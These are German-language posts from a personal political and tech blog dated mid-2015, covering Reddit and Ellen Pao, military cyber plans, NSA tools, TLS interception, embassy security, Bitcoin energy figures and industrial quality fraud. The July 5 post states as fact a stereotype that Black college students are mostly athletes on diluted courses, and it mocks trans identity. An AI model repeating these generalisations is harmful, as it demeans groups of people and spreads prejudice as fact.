Und DAS war der Punkt, als ich mir dachte, OK, die muss da weg. Das ist eine völlig unakzeptable Reaktion in so einer Situation, ein PR-Anfängerfehler. Da muss man dem Gegenüber direkt in die Augen gucken, Mitgefühl heucheln und auf Zeit spielen. Ihr wisst schon, "Ihr Anruf ist uns sehr wichtig, bitte bleiben Sie in der Leitung". Hat sie nicht gemacht. Und damit hat sie in meinen Augen ihren Job verwirkt.
Aber.
Was DA für ein fieser, ekelhafter Ansturm an furchtbaren Anwürfen die Runde machte, das was echt unter aller Sau. So auf dem Niveau von: Die Frau war ja schon immer unfähig, beißt immer andere Frauen um sich herum weg, und kann nur durch Drohung mit Gerichtsverfahren vorankommen. Das war eine Hexenjagd wie damals bei Brandan Eich, nur dass der sich objektiv weniger hat zu Schulden kommen lassen. Ich finde auch die Existenz dieser Petition beschissen, und dass Leute da geklickt haben ist auch beschissen. Leute, die Ellen Pao noch nie getroffen haben, und überhaupt nicht genug über die Situation wissen, um da eine Entscheidung fällen zu können. Wir wissen auch gar nicht, ob Ellen Pao überhaupt involviert war bei dem Feuern von dieser Mitarbeiterin.
Alles in allem: Das war eine echt beschissene Situation, und dass die sozialen Medien sich immer wieder zu solchen unwürdigen Spektakeln hinreißen lassen, das ist eine Schande und die Teilnehmer sollten sich alle schämen. Und Ellen Pao sollte sich für diesen "not fazed"-Kommentar auch schämen. Das war ein Griff ins Klo.
Update: Ich habe da einen Aspekt zu erwähnen vergessen, weil ich dachte, der habe damit nichts zu tun. Ich zitiere mal aus einer Mail:
Und zwar hat Ellen Pao dafür gesorgt, dass Reddit eine neue anti-harrassment policy bekommt. Früher war ja bis auf CP so ziemlich alles bei Reddit erlaubt. Leider auch Subreddits wie /r/fatpeoplehate, wo User sich nicht nur über übergewichtige Menschen lustig machten, sondern auch andere Subreddits stürmten und die Leute dort übelst beschimpften, darunter /r/fitness, /r/loseit und /r/progresspics wo Leute sich echt bemühen was an ihrem Gewicht zu ändern. Ganz ekelhafte Geschichte. Jedenfalls hat Reddit angefangen solche Subs dicht zu machen und dann gab es einen riesen Shitstorm von wegen "muh free speech" und /r/all wurde vollgespamt mit Beiträgen, dass Ellen Pao ein Nazi wäre usw. In diesem Kontext musst du dann wohl auch Ellen Paos Aussage sehen, dass es sie nicht juckt. Es waren einfach kleine Kinder, denen Mama gesagt hat, sie dürfen andere Leute nicht beleidigen.
Dass Ellen Pao für die neue Harrassment Policy gesorgt hat, hatte ich nicht mitgeschnitten. OK, das rückt das natürlich in ein noch unappetitlicheres Licht alles. Seufz.
Update: Hrm, jetzt kommen hier lauter Mails rein, ich soll darauf hinweisen, dass ihr Mann, ein Fondsmanager, ein Schneeballsystem betrieben hat und dafür verurteilt wurde und ihre Forderung in dem Verfahren gegen Kleiner Perkins zeitlich passte und von der Höhe her ziemlich genau der Strafe ihres Mannes entsprach. Nuja. Hörensagen, finde ich. Aber jemand schreibt mir jetzt:
Pao hat aus mehreren Gründen den Hass der Userbase auf sich gezogen. Das ist nicht nur die Sache mit Victoria, das geht schon eine Weile so. Einer der Hauptkritikpunkte ist Zensur und Inkompentenz. Wurden etwa Links zu ihrem Prozess mit ihrem alten Arbeitgeber gepostet, so wurden diese gelöscht. Leute die sich negativ über Pao äußerten? Banned. Geschichten über ihren Mann (Buddy Fletcher), der als Fundsmanager ein Schneeballsystem genutzt und andere ruiniert hat? Banned. Gepostet, wie Pao versucht hat, Reddit selbst zu nutzen, und dabei völlig versagte? Banned. Viel davon wird auch pauschal als Frauenfeindlichkeit abgetan, aber Pao hat reichlich dazu beigesteuert, dass man sie als neue Zensursula zeichnet.
Naja, und es stimmt auch, dass reddit hat sich selbst jahrelang als Free Speech-Aktivisten gefeiert hat. Ist alles komplex und unschön.

Fri Jul 10 2015

[l] Lesetipp: Bei unserer Kriegsministerin cybert es aus allen Rohren. Die Details sind schon fast bewusstseinserweiternd. Da braucht man keine Drogen mehr, alleine das Passivrauchen von den Ausdünstungen dieser Ideen machen schon high.
Es geht noch relativ harmlos los. Man wolle jetzt aufrüsten zur Verteidigung (na klar, wozu auch sonst?!). Und dann wolle man angreifen können. Auf Deutsch: Es wird hier mal wieder nur in die Offensive investiert werden, und dann wundern sich wieder alle, dass die Bundestags-IT von vorbeischlurfenden Obdachlosen gehackt werden kann.
So und dann geht es langsam los mit den Kloppern. Die IT-Ressourcen der Bundeswehr sollen aufgestockt und zentralisiert werden. Ja super, eine zentrale IT, da ist ja dann alles sicher! Man stelle sich das mal vor, im Afghanistaneinsatz kann keiner das Voip fixen, weil das aus der Zentrale gemacht werden muss. Tolle Idee!
So langsam steigt der Bullshit-Druck? Keine Sorge, das wird noch viel krasser. Erstmal das Money Quote hier:
Das Internet und andere Kommunikationsplattformen müssten neben den klassischen Kriegsschauplätzen Land, Luft, See und Weltraum als neuer "Operationsraum" der Bundeswehr definiert werden.
Das Internet als Kriegsschauplatz! Operationsraum der Bundeswehr! Ich freue mich schon auf die neuen Abkürzungen!
Die Bundeswehr müsse nicht nur im Inland in der Lage sein, Cyberangriffe "aktiv abzuwehren". Bei Missionen im Ausland soll es zum Beispiel möglich sein, die Nutzung von Internet und Mobilfunk durch den Gegner "einzuschränken, gegebenenfalls sogar auszuschalten".
A-Ha! Zivile Infrastruktur vernichten! Ja super! Die haben glaube ich das Land verwechselt, für das sie da kämpfen. Zivile Infrastruktur kaputtmachen, sowas machen wir eigentlich nicht. Seit der Haager Landkriegsordnung ist das verbriefter Teil des Völkerrechts, dass man zivile Infrastruktur verschonen soll.
Aber wartet, geht noch weiter. Wer soll denn die Cyberabwehr machen? Die Bundeswehr hat da ja bisher niemanden für! Kein Problem, dafür hat Cyber-Uschi einen Plan! Einen Plan, für den ihr euch mal bequem hinsetzen solltet.
Weil Einsätze der Bundeswehr bei der Cyberabwehr unterhalb eines massiven Angriffs bisher nicht vorgesehen sind, müsse dieses Problem mit den anderen Ressorts "prioritär" gelöst werden. Möglicherweise könnten Reservesoldaten aus der IT-Wirtschaft "in hoheitlichem Auftrag" zur Unterstützung im Cybernotfall herangezogen werden.
Jawohlja!
Aber wartet, da geht noch was.
Da geht noch was, fragt ihr? Wie denn!
Na so:
Ende Juni informierte Staatssekretärin Katrin Suder alle Abteilungsleiter, dass die Unternehmensberatung Accenture eine Diagnose der Fähigkeiten und Ressourcen erstellen wird, Interviews und Workshops sind bereits geplant.
Denn wenn sich jemand mit Cyberwar auskennt, dann ist es Accenture!
Wobei.
Hat jemand eine Statistik, wieviel Schaden Blackwater so angerichtet hat, und wieviel Kosten in der Wirtschaft durch Accenture-Beratungen verursacht wurden? Möglicherweise haben sie ja gar nicht so Unrecht.
Update: Falls sich jemand nicht erinnert: Accenture ist eine "Ausgründung" aus Arthur Andersen, die damals Buchprüfer bei Enron waren. Ich weiß aber auch gerade nicht, wieviel Personal damals unter dem Namen Arthur Andersen abgestoßen wurde, was man heute als "Bad Bank"-Konzept bezeichnen würde. Im Vergleich dazu hat sich Blackwater immer schön umbenannt und heißt heute Academi.
[l] Wart ihr eigentlich auch so überrascht über die zögerliche Reaktion der Bundesregierung? Als rauskam, dass die Amis Merkels Telefon abgeschnorchelt haben? Ja?
Die Amerikaner waren auch überrascht.
Amerikanische Geheimdienste sind erstaunt über die "zögerlichen Reaktionen" der Deutschen, nachdem der Lauschangriff der US-Behörde NSA auf Angela Merkels Handy bekannt wurde.
Die Amis dachte, dass Deutschland zumindest mal den Botschafter einberuft und ihnen Botschaftspersonal ausweist. Denn das hätten sie gemacht, wenn rauskäme, dass der BND Obama bespitzelt. Dann gäbe es sofort "harte nachrichtendienstliche Sanktionen gegen Deutschland".

Mon Jul 6 2015

[l] Och nö. Varoufakis tritt zurück. Begründung:
Soon after the announcement of the referendum results, I was made aware of a certain preference by some Eurogroup participants, and assorted ‘partners’, for my… ‘absence’ from its meetings; an idea that the Prime Minister judged to be potentially helpful to him in reaching an agreement. For this reason I am leaving the Ministry of Finance today.
Die "Verhandlungspartner" hatten deutlich gemacht, dass sie lieber wieder ohne Leute mit Sachverstand am Tisch weiterverhandeln wollen. Das muss ja auch unerträglich sein, wenn auf der Gegenseite jemand verhandelt, der sich nicht wie ein kleiner Schuljunge über den Tisch ziehen lässt. Als Abschiedsgeschenk drückt er dem Schäuble noch einen rein:
We of the Left know how to act collectively with no care for the privileges of office. I shall support fully Prime Minister Tsipras, the new Minister of Finance, and our government.

Sun Jul 5 2015

[l] Bevor es Gender Studies gab, gab es einen Schmalspur-Studiengang für Schwarze, African studies. Wieso braucht man einen Schmalspur-Studiengang für Schwarze? Weil die Schwarzen, die es bis ans College schaffen, meistens Sportler sind, die da eigentlich nicht zum Studieren sind, sondern damit sie beim College-Basketballteam mitspielen. John Oliver hatte da ein paar Details am Rande seines tollen Berichts über die NCAA, wo rauskam, dass die Athleten da durch irgendwelche Schmalspur-Studiengänge geschleift werden, und im Grunde nichts lernen, Hauptsache sie haben Zeit für ihre sportlichen Leistungen. Man darf auch nicht unterschützen, was für ein Big Business College-Sport in den USA ist.
Ich erwähne das jetzt, weil es da neulich den Fall einer NAACP-Aktivistin gab, die vorher African Studies Vorlesungen gehalten hat, von der dann rauskam, dass sie gar nicht schwarz ist. Das ist eine weiße Frau, beide Eltern sind weiß, nicht adoptiert. Die hat sich halt immer schön mit Selbstbräuner eingeschmiert und sich einen Afro gemacht.
Das war in den USA ein Riesenskandal, weil das von vielen analog zu "Sozialschmarotzern" gesehen wurde.
Die geht jetzt jedenfalls rum und erklärt in Interviews, sie sei aber doch eine Schwarze. Die wendet einfach die "Erkenntnisse" der Gender Studies auf die Hautfarbe an. Und warum auch nicht? Wenn man sich sein Geschlecht aussuchen kann, wieso dann nicht auch die Hautfarbe? Money Quote:
“I was actually identified when I was doing human rights work in north Idaho as first trans-racial,” she said.
Und so ist das dann wohl jetzt. Zu privilegiert? Opferrolle nicht glaubwürdig genug? Dann einfach immer schön in die Sonne gehen, Afro aufsetzen und "Ich bin Trans-Schwarzer" sagen!
“My life has been one of survival,” she continued, “and the decisions I have made along the way, including my identification, have been to survive.”
Die hat übrigens auch mal ihre Uni verklagt, weil sie Zugriff auf die Stipendien für Schwarze haben wollte, aber die Uni meinte, sei sei Weiße. Das fand sie ungerecht.
The activist said that officials told her “you probably have white relatives who can help you with your tuition” and revoked her full-tuition scholarship and her TA position. “I thought that was an injustice,” she said.
Update: Jemand wies per Email auf diese Komödie aus den 80ern hin, die das thematisch vorwegnimmt.
Update: Oh, ich muss da noch einen Fehler korrigieren. In dem Text stand Africana Studies, ich hielt das für einen Tippfehler, da ich bisher nur von African Studies gehört habe. Wie sich rausstellt, gibt es Africana Studies auch. Das ist aus der Bürgerrechtsbewegung in den 60er Jahren entstanden, hieß früher Black Studies. Ist halt der Euphemismus dazu, genau wie Schwarze heute African American heißen, ob sie aus Afrika kommen oder nicht.

Fri Jul 3 2015

[l] Wie funktioniert eigentlich xkeyscore? Nun, stellt euch vor, ihr arbeitet für eine US-Bundesbehörde. Ihr seid umgeben von Leuten, die ihre Management-Pläne für Arbeit halten, und Budget für Hardware allozieren, aber für die tatsächliche Arbeit kein Geld einplanen. Was denkt ihr, was dabei am Ende rauskommt? Sowas hier:
XKEYSCORE is a piece of Linux software that is typically deployed on Red Hat servers. It uses the Apache web server and stores collected data in MySQL databases. File systems in a cluster are handled by the NFS distributed file system and the autofs service, and scheduled tasks are handled by the cron scheduling service. Systems administrators who maintain XKEYSCORE servers use SSH to connect to them, and they use tools such as rsync and vim, as well as a comprehensive command-line tool, to manage the software.
Vielleicht hört mir jetzt endlich jemand zu, wenn ich sage, dass wir bei Lizenzen für freie Software eine Klausel gegen Militär und Geheimdienste brauchen?
Aber wartet, einen Lacher habe ich noch:
John Adams, former security lead and senior operations engineer for Twitter, says that one of the most interesting things about XKEYSCORE’s architecture is “that they were able to achieve so much success with such a poorly designed system. Data ingest, day-to-day operations, and searching is all poorly designed. There are many open source offerings that would function far better than this design with very little work. Their operations team must be extremely unhappy.”
Der Mann hat jahrelang einen Cluster aus Ruby-Schnarchware verwaltet, seine Firma ist vor allem bekannt für den Failwhale, und DER will jetzt anderen Leuten sagen, wie man sowas macht! Dass ich nicht lache!
Aber bei aller Schelte für die NSA. Eine Sache haben sie doch richtig gemacht:
Analysts connect to XKEYSCORE over HTTPS using standard web browsers such as Firefox. Internet Explorer is not supported.
MWAHAHAHA

Thu Jul 2 2015

[l] Kennt ihr den schon?
In London fanden die Fachleute in der Residenz eine Tür, deren Schlüssel unauffindbar war – und die, so Hausangestellte, seit 14 Jahren nicht mehr geöffnet worden sei. Was sich dahinter befand, "konnte nicht untersucht werden".
Ein Theater? Ein Altersheim? Nein! Die Residenz deutscher Diplomaten. Hey, wer würde schon ausländische Diplomaten verwanzen wollen oder so! Pfft! Als ob die jemals für irgendjemanden interessante Dinge täten oder wüssten!1!!
Wer sich jetzt denkt, naja, London, Dauerregen, englisches Essen, das ist bestimmt das Abstellgleis der Diplomatie, da schickt man halt die Leute hin, die eh durch sind, in anderen Botschaften läuft das bestimmt besser ab! Für diejenigen habe ich schlechte Nachrichten:
Der BND rügte zudem, dass die Telefonanlage nicht von einer deutschen Firma gewartet wurde, sondern ortsansässige Techniker Administratorenrechte besaßen
Das war in Beirut. Und wenig überraschend wurden ihnen dann Telefonate abgeschnorchelt.
Andere Telefonanlagen hatten keine Adminaccounts in ausländischer Hand, waren aber auch nicht besser in Schuss:
Andere erlaubten, dass der Anrufschutz durchbrochen werden konnte, dass die Anlage bei einem Besetztzeichen also selbständig nach einem anderen, freien Anschluss im Gebäude suchte. Vielfach hatten die Sicherheitsbeauftragten auch versäumt, die "Aufschalt"-Funktion der Telefonanlagen zu deaktivieren.
Ein Glück, dass unsere Geheimdienste so fit sind, dass sowas schnell auffällt! Also konkret in diesem Fall bei panische Spot-Checks nach den Snowden-Enthüllungen. Vorher Jahrezehntelang Schweigen im Walde, ab und zu mal ein Mahnbrief, man möge doch mal folgene Dinge fixen. Aber die Diplomaten haben es da nicht eilig, die sind sogar zu faul, für ihre sensiblen Besprechungen die eigens gebauten abhörsicheren Räume zu benutzen. Zu unbequem! Lieber in den Meetingraum mit der Glasfront, und Fenster auf für Belüftung und so!
Und sonst so?
In Paris fanden sie im Besprechungsraum einen "Mauerdurchbruch", den sie als "sehr bedenklich" einstuften. Zudem entdeckten sie unbenötigte Heizungsrohrenden. […] Ebenso in Tel Aviv, wo Deckendurchbrüche nicht verschlossen waren, obwohl das bereits Jahre zuvor angemahnt worden war.
Da weiß man, was man hat! Ich weiß, ich weiß! Die brauche alle eine Gehaltserhöhung, dann machen sie auch ihren Job richtig!1!! Lacht nicht, das argumentiere unsere Abgeordneten auch bei jeder Diätenerhöhung so und kommen damit durch! (Danke, Erhard)
[l] Hier ging per Mail der Hinweis ein, dass die Bundeswehr jetzt SSL-Verbindungen der Soldaten ins Internet abfängt und mit Fake-Zertifikat reinguckt. Die offizielle Begründung ist natürlich, nach Malware zu gucken.
Ich weiß, dass das auch in Gefängnissen so gemacht wird.
Ich befürchte, dass wir es hier mit einem Vorläufer der nächsten Kryptokriege zu tun haben. Das schrittweise die Bedeutung von Menschenrechten wie dem Briefgeheimnis immer weiter abgeschwächt werden, genau wie die NSA-Enthüllungen ja das Gefühl abgeschwächt haben, dass man sich im Internet ungestört unterhalten kann (das war übrigens noch nie gerechtfertigt, das Gefühl).
Verschlüsselung ist unsere letzte Verteidigungslinie. Wir haben uns schon von dei meisten anderen Prinzipien der Aufklärung verabschiedet.
Wir lassen unsere Nachbarn nicht in unser Internet, weil wir uns daran gewöhnt haben, dass Internet Geld kostet und das Haftungsfragen aufwirft. Ja warum eigentlich?
Wir haben uns von der Idee verabschiedet, dass man sich im Netz bewegen kann, ohne abgehört zu werden. Ja warum eigentlich?
Und jetzt versuchen sie, uns der Reihe nach abzugewöhnen, dass wir ein Recht auf Verschlüsselung haben. Erst in so Kontrollhochburgen und Randgebieten wie Gefängnissen und der Bundeswehr, dann werden sie der Reihe nach alle anderen Argumente durchprobieren. Terrorismus, organisierte Kriminalität, Kindesmissbrauch, Jugendschutz, und am Ende wird die Contentmafia in eure SSL-Verbindungen reingucken wollen, um zu prüfen, dass ihr keine Musik raubkopiert.
Ich möchte betonen, dass es keinen weiteren Rückzugsraum gibt. Wenn wir uns die Verschlüsselung wegnehmen lassen, dann können wir das Internet auch gleich wieder zumachen. Und ich rede hier von Ende-zu-Ende-Verschlüsselung, denn alles andere ist Schlangenöl. Das haben sie ja auch schon versucht, uns das als "das ist doch auch verschlüsselt dann, das reicht doch!1!!" zu verkaufen. Fallt auf sowas nicht rein.
Achtet da mal drauf. Ich sage voraus, dass das in nächster Zeit zunehmen wird, dass öffentlich "Probleme" thematisiert werden, die wir haben, weil jemand verschlüsselt hat. "Diesen Terroristen konnten wir nicht aufhalten, denn er hat seine Festplatte verschlüsselt". Das gab es schon mal zaghaft im Zusammenhang mit Skype, aber das fiel ja gleich wieder in sich zusammen, als wir darauf hinwiesen, dass Skype natürlich gesetzeskonform Abhörschnittstellen anbietet.
Update: Kommentar per Mail:
was Du unter http://blog.fefe.de/?ts=ab6b87e5 bei der Bundeswehr ansprichst, ist für Hamburger Schulen seit einiger Zeit normal.
Der feuchte Traum der bis zum Anschlag im Arsch der Contentmafia steckenden Schulbehörde ist es, jederzeit kontrollieren zu können, wer was im Internet macht (Lehrer, Schüler, etc.).
Die zu diesem Zweck ausgerollte "Lösung" nennt sich "Time for Kids" "Schulrouter Plus" und ist insgesamt ein "Internet minus", etwas derartig zusammengestricktes habe ich bisher noch nicht gesehen. Dass Sachkenntnis in diesem Bereich gerne von Stock-Fotos und bunten Flyern ersetzt wird, versteht sich von selbst…
Wobei ich ja sagen muss, dass ich das in Hamburg durchaus verstehen kann. Da ist man ja quasi direkt in der Nachbarschaft des LG Hamburg.
Update: Noch einer:
nicht nur die Bundeswehr macht das, sondern auch das Arbeitsamt. Für die habe ich mal ein Jahr lang Tech Support gemacht. Da sitzt dann ein Squid mit nem selbstgepopelten root certificate davor, was auf allen Rechnern verteilt ist. Zumindest im IE funktioniert das. Man hatte auch mal versucht, da Firefox einzuführen, aber der blockt, sobald er etwas nicht erkennt.
Update: Auch an Berliner Schulen, in mindestens einer öffentlichen Verwaltung und die Rentenversicherungen setzen sowas anscheinend ein. Wie gruselig! Schade, dass wir keine Parteien haben, die sich um Bürgerrechte kümmern, sonst würde man das gesetzlich verbieten. Fernmeldegeheimnis und so. Das kann ja wohl nicht sein, dass eine Organisation erfolgreich argumentieren kann, das Fernmeldegeheimnis sei nicht verletzt, weil da ja kein Mensch sondern nur eine Software mitliest. Das wäre ja wie wenn man behauptet, Videoüberwachung sei nicht schlimm, weil das eine Kamera und kein Mensch ist.

Wed Jul 1 2015

[l] In Belgien ist jetzt eine 24jährige Frau für das Euthanasie-Programm zugelassen worden, die an Depressionen leidet. Die Formulierung im Gesetz ist wohl, dass man an nicht behandelbaren unerträglichen Schmerzen leidet.
Nun sind Depressionen nicht mit körperlichen Schmerzen verbunden, aber weil das als unheilbare Krankheit gilt, haben sie wohl eine Ausnahme gemacht. Die Frau hat schon mehrere Selbstmordversuche hinter sich.
Update:
Du schreibst ja "aber weil das als unheilbare Krankheit gilt, haben sie wohl eine Ausnahme gemacht.". Tatsächlich liest man im Gesetzestext aber unter §2 2):
[The physician must in each case]
"be certain of the patient’s constant physical
or mental suffering and of the durable
nature of his/her request"
Das Gesetz ist also sehr wohl auch für mentale Probleme gemeint.
[l] Hier kommt eine lange Mail zur Dogfight-Fähigkeit des F-35 rein, die ich euch mal zeigen möchte:
Kurz und knapp:
Die F-35 ist ein Mehrzweckkampfflugzeug mit Tarnkappeneigenschaften. Das soll keinen Dog-Fight können. Es ist dafür entwickelt worden seine Mission zu erfüllen ohne von der gegnerischen Luftabwehr abgeschossen zu werden.
Da hat man eine eher unwichtige Eigenschaft eines modernen Kampfflugzeuges getestet und zwei grundverschieden Flugzeuge verglichen. Die F-35 ist im Normalfall doppelt so schwer wie die F-16. Das maximale Lastvielfache ist ein Indiz wie eng ein Flugzeug kurven kann.
Das der F-16 ist doppelt so hoch. Wie man solche Aussagen bewerten sollte beschreibe ich unten.
Siehe auch:
https://en.wikipedia.org/wiki/Post%E2%80%93World_War_II_air-to-air_combat_losses
https://de.wikipedia.org/wiki/Lockheed_Martin_F-35#Technische_Daten
https://de.wikipedia.org/wiki/General_Dynamics_F-16#Technische_Daten
Ausführlich:
Ich habe während meiner Offiziersausbildungszeit bei der Luftwaffe und später beim Studium (Luft- und Raumfahrttechnik) sehr viel zu diesem Thema gehört. Vieles immer nur mündlich, daher hier keine großen Quellen.
Dieses "Gejammer" der Piloten über die Dog-Fight-Fähigkeiten der Kampfflugzeuge gibt es schon sehr lang. (Selbst gehört von angehenden Piloten, die noch nie im Flieger saßen!)
Auf Flugmediziner Seite erzählte man, dass das alles nur ein psychologisches Problem der Piloten ist. Die Piloten wollen, verständlicherweise, immer in der Lage sein sich selbst zu verteidigen falls es zu einer Begegnung mit einem feindlichen Kampfflugzeug kommt. Daher bestehen sie unter anderem darauf, ein Bordgeschütz im Flugzeug mitzuführen. Dazu gleich mehr.
In Kampfeinsätzen kommt es aber so gut wie nie zu einer Begegnung mit einem feindlichen Flugzeug, da der Luftraum z.B. durch AWACS komplett überwacht wird und man nur mit Absicht auf feindliche Flugzeuge stößt. Der Dog-Fight ist zwar noch immer Teil des Trainings, wird aber immer weiter reduziert. Die Bundeswehr übt das z.B. im Übungsgebiet vor der Küste Sardiniens. Da hat man mir erzählt dass das nur noch als eine Art Belohnung für die Piloten veranstaltet wird und für Tests neuer Systeme. Aber in den 80er-90er Jahren trat man sich auf den Füßen rum so viel war da los.
Gemessen an der Verlusten von Flugzeugen durch andere Flugzeuge im Dog-Fight sind jedoch die Verluste durch Flugabwehr und Pilotenfehler ein viel größeres Problem. Daher setzen alle neuen Flugzeuge auf Stealth-Eigenschafen und Selbstschutzmaßnahmen. Es ist viel wichtiger ein Flugzeug auf diese Anforderungen zu zuschneiden als auf den Dog-Fight. Ich denke, da mag einer einfach das Flugzeug nicht. Das Geheule gab es auch als die F-14 aus dem Verkehr gezogen wurde und durch die weit überlegene F-18 ersetzt wurde. Was war das für ein Drama :).
Zum Thema Bordkanone:
Im Eurofighter war ursprünglich keine Bordkanone vorgesehen, weil man aus den Statistiken wusste, dass sie quasi nur im Einsatz gegen Ziele am Boden bedingt nützlich waren. Gegen Flugzeuge war die Ausbeute bescheiden. Fast alle Abschüsse auf mittlere Entfernung und im Dog-Fight wurden mit Raketen erziehlt. Daher wurde extra für den Eurofighter die IRIS-T (https://de.wikipedia.org/wiki/IRIS-T) entwickelt. Das verzichten auf die Bordkanone spart jede Menge Gewicht und macht ein Flugzeug dadurch leistungsfähiger, in fast allen Bereichen. Auch im Dog-Fight. Alle Entwickler sahen das so, nicht aber die Piloten. Als das Design dann fertig war sagten die: "Da steigen wir nicht ein. Was ist wenn die Raketen alle sind?" Darauf rollten die Entwickler mit den Augen, da die Piloten einfach nicht in der Lage waren die Fakten zu verstehen oder dies nicht wollten. Die Politik erzwang dann den Einbau einer Bordkanone. Das ist einer der Gründe warum der "Jäger 90" etwas länger dauerte. So eine Bordkanone ist so schwer und groß, dass man das komplette Flugzeug umkonstruieren muss.
Moderne Flugzeuge sind immer wendiger, d.h. auch der potentielle Gegner. Die Flieger können so eng Kreisen, dass man bildlich gesprochen um die Ecke schießen muss um sie zu treffen. Das kann man aber nur mit Raketen.
Ich habe die Erfahrung gemacht, dass die Luftfahrt für die meisten Leute zu kompliziert um sie im Detail zu verstehen, was normal ist. Anstatt dann aber auf die Ingenieure zu vertrauen wird vieles nach Bauchgefühl bewertet und entschieden. Das betrifft sowohl die Politik als auch die Piloten. Daher ist die Luftfahrt auch in der Entwicklung erzkonservativ. "Man darf die Leute nicht zu sehr erschrecken, die haben eh schon Angst wenn sie sich in die Luft begeben." Bestes Beispiel: Pilotenfreies Flugzeug. Gute Idee, absolut sinnvoll, aber keiner würde einsteigen. Mal schauen wie sich die fahrerlosen Autos entwickelt. Es würde viel Menschenleben retten, aber die meisten Menschen werden es nicht nutzen wollen, da sie ja nicht eingreifen können wenn was schief geht. Man denke nur an die Diskussionen als ABS eingeführt wurde. "Oje der Bremsweg wird länger, wir werden alle sterben."

Tue Jun 30 2015

[l] Jede Bitcoin-Transaktion kostet inzwischen soviel Energie, wie 1,57 US-Haushalte für einen Tag brauchen. Und wenn man einrechnet, dass ein Großteil der Transaktionen der Herumschieben von Minern und Exchanges ist, dann sieht die Rechnung noch schlechter aus. Na kein Wunder, dass wir mit den CO2-Zielen nicht vorankommen!
Update: Bei solchen Zahlen ist es immer wichtig, mal zu prüfen, ob der Vergleichswert korrekt ist, und ob die ihre Einheiten verkacken. In diesem Artikel wird der chinesische Strompreis in "3 to 6 cents per kw/h" angegeben. Tatsächlich berechnet man den Strompreis in kWh, also Multiplikation statt Division. Da kann man die Sache schon zu den Akten legen, aber gucken wir mal weiter. Laut des Links von ihnen verbraucht der durchschnittliche Amerikaner knapp 11000 kWh pro Jahr, das wären dann um die 30 kWh pro Tag. Wenn man von 215 MW und 110000 Transaktionen pro Tag ausgeht, kommt man bei 1,954 mWh raus pro Transaktion. Das ist der Stromverbrauch pro Stunde, nicht pro Tag. Der Artikelautor hat hier also gleich mehrfach ins Klo gegriffen. Der durschnittliche Stromverbrauch pro Haushalt in Deutschland liegt übrigens bei ca 3150 kWh pro Jahr, d.h. weniger als ein Drittel der Amis.
Update: OK, nochmal langsam zum mitschreiben.
215 MW, 24 Stunden pro Tag -> 5160 MWh für einen Tag.
110k Transaktionen pro Tag -> 46.91 kWh pro Transaktion.
Durchschnittlicher Stromverbrauch pro US-Haushalt: 10908 kWh/Jahr, 365 Tage pro Jahr -> 29.88 kWh pro Tag.
46.91 / 29.88 = 1.57. Was der Artikel auch geschrieben hatte.
Kaum macht man's richtig, funktioniert's!
Mir ist ja gerade aufgefallen, was für eine schwachsinnige Einheit kWh ist. W ist J / s. Da nochmal Zeit draufzumultiplizieren, sollte daraus wieder J machen, nicht Wh. Total beknackt.
Aber, damit daraus ein Schuh wird, sollte man das nicht mit dem Haushaltsverbrauch vergleichen, sondern mit dem Strompreis. Man zahlt im Moment für eine kWh so knapp 30 Cent in Berlin. 46.91 kWh für eine Bitcoin-Transaktion wären also rund 14 Euro. Das kommt mir jetzt ein bisschen viel vor für eine Überweisung. Da kann man ja gleich bei der Deutschen Bank sein Konto haben! Wobei das Mining daher in China gemacht wird, in Bereichen mit Stromüberfluss wegen Staudamm und zu schwacher Leitung nach draußen zum wegtransportieren des Stroms und so. Und es ist natürlich in jedem Fall eine Milchmädchenrechnung.

Sun Jun 28 2015

[l] Endlich bringt mal jemand im Wahlkampf den War on Drugs mit Jim Crow in Verbindung. Jim Crow ist der Name für die Rassentrennungsgesetze in den USA. Und der War on Drugs von Bill und Hillary Clinton hat mehr junge Schwarze in die Gefängnisse gebracht als irgendwas anderes in der Geschichte der USA. Das ist ein Punkt, den Greg Palast schon häufiger gemacht hat. Schade nur, dass ausgerechnet Rand Paul das jetzt als Talking Point nimmt, denn die Republikaner haben ja ihr eigenes Jim Crow-System am Laufen gerade.

Fri Jun 26 2015

[l] Ach du meine Güte. Hier kommt gerade noch eine Mail rein, aus der ich mal versuchen werde, die Teile zu zitieren, die den Einsender nicht in Gefahr bringen werden. Achtung: Das ist harter Tobak.
Dein letztes Posting zur Softwareentwicklung gibt mir zu denken. Ich komme aus dem Qualitätsmanagement in der Metall-Industrie und bei uns läuft das ganz genau so. Ich will nicht sagen, dass jedes Auto Schrott ist, aber ganz viele Sachen laufen ganz schlimm falsch. Die alten Hasen sagen, das war schon immer so.
Was Du über Software geschrieben hast, trifft auch hier zu. Die Entwickler (ich vermute, das Management sieht hier die letzten Gewinnmargen) sind die heiligen Kühe. Dann kommt lange nichts, Wüste. Irgendwo kommt die Qualitätsabteilung, aber das sind eh immer zu viele, da wurde letztens einer gesehen beim Kaffeetrinken, gleich zwei Leute wegkürzen -.- Am Ende kommen die, die tatsächlich was arbeiten.
Das sind bspw. im Karosseriebau nicht die ausgebildeten Karosseriebauer (die machen leicht höherwertige Arbeit wie Qualitätskontrolle) sondern Hilfskräfte mit Jahresverträgen, Leiharbeiter usw. Die werden kurz angelernt und dann mit (nicht lachen) einem Ringbuch und einem total überforderten Teamleiter/Meister (zu viele Menschen pro Chef) an ihre Station gestellt, *Stückzahl* machen. Man versucht natürlich die Jobs bei denen noch was verdient wird zu reduzieren, also sollen die Werker mit der sog. Werkerselbstkontrolle bitte schauen, dass sie ihren Scheiß gefälligst richtig machen (Anstatt QS). Damit wird die Verantwortung von oben nach unten durchgereicht.
Qualitätssicherung ist dann nur Schadensbegrenzung und vor allem Schummeln. So wird zT außer Haus produziert und dem Kunden (zensiert) gegenüber behauptet das man die Teile selbst gemacht hat. In einem anderen Fall habe ich regelmäßig erlebt, dass schlechte Schweißnähte u.a. nachgearbeitet wurden, obwohl der Kunde (zensiert) das nicht wusste und das nicht freigegeben hatte (wäre Pflicht gewesen, aber: "des merken die eh nicht").
Um wieder auf Dein Posting zu kommen: Auch die Industrie legt, dank Management, immer weniger Wert auf eine Produktion bei der man wenigstens ruhig schlafen kann. Immer wichtiger werden die Broschüren und die Kennzahlen ("können Sie das nicht so rechnen das es weniger schlimm aussieht?"). Das geht soweit, dass Qualitätskontrollen weggestrichen werden und die Fehler der Zulieferer in der Produktion ausgebügelt/umgangen werden müssen. Oder man schickt Rücksendungen von Kunden einfach nochmal hin und behauptet das es sich um neue, gute Teile handelt. Wenn dann nur noch die Hälfte der Teile reklamiert wird freuen sich alle ("Siehste, war gar nicht so schlimm.").
